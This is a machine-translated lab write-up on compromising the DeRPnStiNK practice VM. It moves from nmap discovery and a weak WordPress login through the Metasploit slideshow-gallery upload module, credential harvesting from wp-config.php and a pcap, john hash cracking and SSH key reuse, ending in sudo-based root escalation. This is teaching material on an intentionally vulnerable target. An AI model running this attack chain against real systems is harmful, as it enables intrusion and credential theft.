Shulou(Shulou.com)05/31 Report--

Today, I would like to introduce an example analysis of DeRPnStiNK target penetration. The content of the article is good. Now I would like to share it with you. Friends who feel in need can understand it. I hope it will be helpful to you. Let's read it along with the editor's ideas.

DeRPnStiNK target machine penetration

From the Internet, we found the DeRPnStiNK target machine as the experimental environment, for beginners, we use this target machine to carry out penetration experiments.

After downloading the target machine on the Internet, open it directly through the virtual machine, and the network card configuration uses the default bridging mode. Note here that your kali attack machine must also be in bridging mode to ensure normal communication with the attacked server. First of all, if we are not sure the address of the attacked server, we need to discover the host and check our IP address: 192.168.50.76, as shown in the figure:

To use nmap or netdiscover for network discovery, the command is as follows: nmap-sP192.168.50.0/24 (here-sP mainly does host discovery and skips port scanning and other detections) or netdiscover-r 192.168.50.0max 24. The IP address of our attacked server is found as shown in the figure:

After we find the IP address of the server and scan it with nmap-A, we find that ports 21, 22, 80 and so on are open, as shown in the figure:

We can access the http service through a browser to see what's in it. The following is the page we observed:

When we get a page that cannot provide us with more information, we can first check the page source code information. (if it is a picture or other content, we right-click the page and do not come out to view the source code information, so we use view-source): view the page source code information, as shown in the figure, find a flag message in the source code:

We are looking for more useful information through other visits, as shown in the figure:

We look at the following sentence through the webnotes/info.txt file: stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live. This sentence means to make sure that your local dns is updated before you can access derpnstink blog information.

By looking for a variety of paths to find that there is no better sensitive information for us to use, and after no available information is found in the directories and links provided, we can try to scan the directory using the command: dirb or Imperial Sword tool. After the scan is completed, we will find the sensitive path weblog. Try to access the path and find that the domain name jumps as follows. Using the above prompt, we try to add domain name resolution to the host file. The host file under Kali is located in / etc/hosts.

Add the hosts value as shown in the figure:

After adding the hosts value, we visited the weblog directory and found that it could be accessed normally.

So what are we going to do next? Through observation, you can see that this is a wordpress blog and try to access it through the default administrative background through wordpress. Default background path: wp-login.php. After obtaining the background path, we generally need to detect weak passwords. Try to log in using admin/admin and find that you have successfully entered the background.

Next, you can use the wordpress scanning tool to discover vulnerabilities. Wpscan can be used under kali, as shown in the figure: (note the path during wpscan scanning) wpscan-url http://derpnstink.local/weblog/

The marked version information, here we apply the corresponding vulnerability information. There will be a corresponding exploit module in metasploit. We enable msfconsole to find the corresponding module wp_slideshowgallery_upload. Use the command search wp_slideshowgallery_upload. Use the use command to load the module after it is found. As shown in the figure:

Use options to view the configuration items and configure them according to your target machine, as shown in the figure:

As follows, we got a shell: you can view the sensitive files in it.

Note that in the process of daily infiltration, we find that files such as config have to check whether there is necessary information. As shown in the figure, we can get the database user name and password information in weblog/wp-config.php:

We will find the php/phpmyadmin path when we scan the directory through dirb or Imperial Sword. This is the database web background of php-study. Log in to root/admin with the username and password we just found.

We will find flag2 in the database. And the username password hash value in wp_users.

Many tools are integrated under kali. After we get a string of encrypted hash values, we try to analyze its encryption type through hash-identifier. Note that this tool is not a cracking tool, but is only used to determine the type of encryption. As shown in the figure:

Use john for password cracking. The rockyou.txt based here is included with kali. Log in to ftp using the wedgie57 password.

Through the connection tool, (the Mobaxterm,xshell I use, etc.) can access the target host through ftp. Two files can be found: a conversation and a ssh login key file (in the ssh folder, named key, it must be the ssh login key file)

Using the ssh key to log in, we save the key information and log in through ssh-I. As shown in the figure:

After entering the system through a ssh connection, look at the file and you will find flag.txt. As shown in the figure:

We found another sensitive file, the derpissues.pcap packet file. You can analyze the packet through wireshark to see what information it contains.

When using scp for file transfer, the specific commands are as follows:

Start wireshark and open the derp.pcap file directly. Because there are many packets, filter the http protocol packets. (why filter http packets here? because in the conversation we found above, we found that it is possible for the user to add new users, and it is necessary to log in to weblog/wp-admin. So try to filter the http protocol first by looking at requests such as get,post. Looking for submitted information. We found that the user and pwd password fields clearly read: Form item: "pwd" = "derpderpderpderpderpderpderp".

Try to establish a new connection using the mrderp user through ssh: as shown in the figure:

We will find a string of information in helpdesk.log: we will find that the problem is handled by the sudo user. So we tried to use the sudo command.

Through sudo-l, let's check the permissions we have, as shown in the figure:

That is, mrderp users can only use sudo when executing derpy* files in the binaries directory. So we create the binaries folder and the derpy.sh executable under the corresponding target directory. The derpy.sh file needs to be modified to be executable, which is executed using sudo. Root successfully raised the rights

Look at the root user file and find flag.

The above is the whole content of DeRPnStiNK target penetration case analysis, more content related to DeRPnStiNK target penetration case analysis can search the previous articles or browse the following articles to learn ha! I believe the editor will add more knowledge to you. I hope you can support it!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.